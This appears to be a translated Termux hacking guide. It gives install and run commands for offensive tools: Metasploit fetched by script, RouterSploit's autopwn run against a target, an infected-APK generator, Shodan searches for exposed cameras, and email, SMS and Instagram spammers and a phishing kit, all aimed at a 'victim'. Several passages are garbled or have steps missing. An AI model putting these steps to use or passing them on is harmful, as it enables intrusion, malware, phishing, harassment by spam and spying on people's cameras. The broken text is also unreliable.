Termux Guide
Termux Guide
Content
• ls..................................................................................................................................3
• ls..................................................................................................................................5
Basic Commands:
apt update
Update the list of available packages. These commands must be run initially
directly after installation and regularly thereafter to receive updates.
apt upgrade
Update obsolete packages. In order for Apt to learn about newer packages,
you'll need to update the package index, so you'll typically want to run apt
update before updating.
apt list
dpkg -L <package>
dpkg --verify
See the apt man page (run apt install man to install a man page viewer first) for
more information.
ls
CD
It takes us home
cd <file name>
Go to said file
exit
Some tools:
Metasploit
It is designed to exploit computer vulnerabilities and is undoubtedly the program
most used by the best hackers in the world.
• pkg upgrade
• pkg install curl
• curl –LO
https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/met
asploit.sh
• chmod 777 metasploit.sh
• ./metasploit.sh
• ls
• cd metasploit-framework
• Start the console: ./msfconsole
TOOL-X
It is a Script to easily install different tools:
• pt update
• pkg install git
• git clone https://github.com/Rajkumrdusad/Tool-X.git
• cd Tool-X
• chmod +x install.aex
• sh install.aex if it doesn't work run ./install.aex
• Run from Tool-X console
FSociety
A penetration testing framework will have all the scripts a hacker needs.
Lazymux
Tool similar to fsociety
<INSTALLATION>
- future
- requests
- paramiko
- pysnmp
- pycrypto
• cd routersploit
We install the requirements.
• python3 -m pip install -r requirements.txt
• python3 -m pip install -r requirements-dev.txt
• We run RouterSploit
• python3 rsf.py
<USE>
Once RouterSploit is launched, we select the scanner module with autopwn (this
will launch all exploits against the target)
• use scanner/autopwn
IP Geolocation:
Tool that geolocates the victim using their IP address:
Malicious:
Malicious is a tool to create infected apk or executables for android, mac,
windows etc... Very good tool, waited and you like it.
First we proceed to update the terminal with
A list of systems will appear to which a malicious apk can be generated, in this
case Android 1
And for example dendroid
35
The apk will now be generated for us. To move it to memory so we can share it,
we proceed to list and then select Android
ls
android cd
We list again
ls
mv Dendroid.apk /sdcard
Devploit
Devploit is a multi-tool that will allow you to do various functions such as tracking
an IP to extracting data from web pages and devices... I hope you like it
- git clone https://github.com/joker25000/Devploit
- cd devploit
- chmod +x install
- ./install
- python2 Devploit.py
WepPwn3r
Today I bring you the WepPwn3r tool that is used to scan web pages for bugs
and vulnerabilities.
For those who are just installing termux, put the following...
• -apt update
• -apt upgrade
• -pkg install git
• -pkg install python
• Cd metasploit-framework
• ./msfconsole
• use auxiliary/gather/shodan_search
• show options
Then they create an account on shodan
They go to shodan.io
Click to create green button
Then you start transfer
Then click where the blue arrow points
You will get something like this
- m02ZKlMk4qQTHUVooORM7Pf5Va7OI4oH copy
They go to termux and finish configuring
Then
You will get a list of IP addresses, copy any IP address and paste it into your
browser.
And shows them the camera
Email, SMS and Instagram spammers
Email-bomber:
• git clone https://github.com/zanyarjamal/Email-bomber.git
• cd Email-bomber
• python2 E-bomber.py
• It will ask for a mail server, Gmail or Yahoo
• It will ask for your email depending on what you entered above. Enter
your email
• Enter your password to log in (it's secure)
• Enter the victim's email, the message to send and the number of emails
to send
Spammer-Grab
• git clone https://github.com/Noxturnix/Spammer-Grab
• cd Spammer-Grab
• ./auto-install.sh
• python2 spammer.py –h (h shows you the commands)
• Example:
• Python2 spammer.py –delay 15 (delay is the time it will take to send the
messages, you can enter any number) (here the victim number with the
country code)
• Python2 spammer.py –delay 10 5918844747
Instaspam:
Tool to spam Instagram accounts
ShellPhish:
Tool to do phishing and also extracts IP addresses and extra information